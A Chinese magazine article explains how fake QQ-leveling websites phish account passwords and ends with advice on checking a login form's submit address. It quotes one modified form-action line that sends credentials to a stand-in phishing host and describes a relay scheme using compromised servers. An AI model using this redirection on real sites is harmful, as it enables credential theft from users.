文章作者:HaK_BaN[BCT](http://www.cnbct.org
信息来源:邪恶八进制信息安全团队(http://www.eviloctal.com
备注:本文已经刊登在9月《 手册》中,转载时请标明出处以及文章完整性,本文首发漏洞中心小组,后作者友情提交到邪恶八进制,
网络钓鱼式攻击挂QQ等级网站
。不知道从什么时候开始网络上就开始兴起了挂QQ的风潮,谁都为了腾讯所谓的等级在不断的挂Q挂Q,就连挂着QQ
拿个等级有啥作用也不知道的人,看着别人有自己没有就感觉特不爽,所以慢慢的挂Q成为了一种时尚,也成为了一种新的业务.网上各种各类的挂QQ网站层出不穷,而且没有丝毫的减少,但是有没有人去怀疑你所使用的挂QQ
网站是不是真的安全了?
为了保护作者以及杂志社本身请大家看完”免责声明”后方可阅读.
免责声明:
作者无法鉴别判断读者阅读本文后的用途,如果读者在阅读本文后违反国家法律规定而出现的纠纷与及不良结果,由行为人独立承担所有责任,本文的作者以及刊登该文章的杂志社均不负责也不承担任何法律责任。
现在盗取任何聊天软件的号码,不外乎就是利用 软件以及键盘记录软件记录被种植主机的账号以及密码,这种累赘而又需要多方软件支持的手法已经过时了,而现在行之有效的就是利用无污染(不需要软件以及任何病毒)去进行的盗取账号密码的网络钓鱼攻击,网络钓鱼已经变成了 以及一些不法分子用来进行银行账号以及等等相关敏感信息盗取的最有效最快速的途径,而我们也可以利用网络钓鱼在一夜之间拥有成千上万的QQ
号以及密码(甚至于QQ密保信息).首先钓鱼者本身是会仿冒一个挂QQ的网站页面,因为要致使访问者可以相信,所以在仿冒会根据时下最多人访问的挂QQ
网站进行设计
仿冒好一个虚假的网站之后,钓鱼者本身会想办法如何去保存所钓到的资料,通常在钓鱼网站中都会采取本地记录相关资料,但是整个用户的使用流程就会在输入账号以及密码后出现问题,就是说钓鱼者自身会想个借口出来说:”该系统因系统繁忙,暂时无法为你服务!”等等的理由,让被钓者信服,但是现在作为被钓者本身已经不再这么的愚蠢,所以传统的钓鱼模式已经无法行得通.为了可以使被钓者整个使用流程不会出现任何的怀疑,所以钓鱼者会在提交处做一定的手脚.让我们看看例子:
Code:
}
function
Login()
{window.open(“about:blank”,“qqLogin”,
“width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
o”);
document.QQForm.target
=“qqLogin”;
document.QQForm.action=
“login.asp”;
document.QQForm.submit();
}
因为篇幅关系删除多余语句
从上面的代码我们可以看到,这是一个正常挂Q网站的登录页面代码,当用户访问网站的时候,输入的账号以及密码就会提交给login.asp
页面,然后再转去挂Q系统.如果作为钓鱼者本身想完美的结合真实的挂Q
网站去完成整个操作流程,那样子他就必须在这个提交页面做一些修改,使到被钓者的信息先存储在自定的地方,然后再转发到真实的挂Q
网站,所以钓鱼者会有可能的把代码提交的语句修改为:
Code:
document.QQForm.action=
“http://www.phishing-attack.com/pass.asp”;
在这里我们可以看到钓鱼者把提交的数据转发过去了http://www.phishing-attack.com
钓鱼网站--------------中间记录站----------------真实挂Q网站
当用户访问的时候,会将密码提交给钓鱼网站,钓鱼网站会把数据转去中间记录站,然后在中间记录站进行数据的保存,再次将用户所提交的数据提交给真实的挂Q网站,这样子在过程中用户不单止可以完成整个操作的流程,并且钓鱼者本身可以记录密码信息延长整个钓鱼网站的生命周期(作者注:通常钓鱼网站自身的生命周期为15
天).
整个思路就是如此了,然而中间站的作用是为了保存信息以及保护信息的安全性,不必担心当虚假网站被发现时,所保存的数据会被发现,通常这些作为中间站的网站都是钓鱼者的傀儡,有可能是被入侵后的,或者利用免费空间或者是只有7天试用的测试空间作为临时的中转.
本文在此就把整个钓鱼网站的过程说清楚了,因为内容有一定的危害性,所以把中间站以及真实站之间的技术问题都屏蔽了,大家在使用挂Q网站的时候,请多留心注意一下挂Q网站的首页源码,看看提交处的地址和你所使用的网站地址是否一致,如果是一致的话,也不用这么高兴,如果钓鱼者本身是在本地记住你的信息,那样子你还是一样躲不过被钓的威胁,QQ
等级是否真的比你的号码还重要,如果你觉得还是等级重要的话,你可以放心的去挂你的QQ,我和玄猫有一句话送给大家:”平平安安网站挂,哭哭啼啼QQ
丢”.请大家看清楚相关的利弊关系别麻木的去相信所谓的挂QQ网站!本文到此结束,如果对于本文有任何关于防御以提防的地方可以到”非安全― 手册”或者”Bug.Center.Team”询问!